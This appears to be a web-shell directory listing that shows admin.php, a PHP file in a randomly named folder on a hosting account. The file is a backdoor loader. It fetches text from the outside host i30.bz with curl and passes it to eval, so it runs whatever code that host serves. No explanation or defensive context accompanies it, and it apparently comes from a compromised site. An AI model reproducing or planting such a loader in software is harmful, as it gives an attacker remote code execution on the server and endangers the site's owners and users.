| Current Path : /home/seto/gsuite.media-rock.com/mxdjfqa/vpwcejt/hbkj1md/ |
| Current File : /home/seto/gsuite.media-rock.com/mxdjfqa/vpwcejt/hbkj1md/admin.php |
<?php
function get($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
$ok = '?>';
eval("$ok" . get('https://i30.bz/f/KEY.txt'));
?>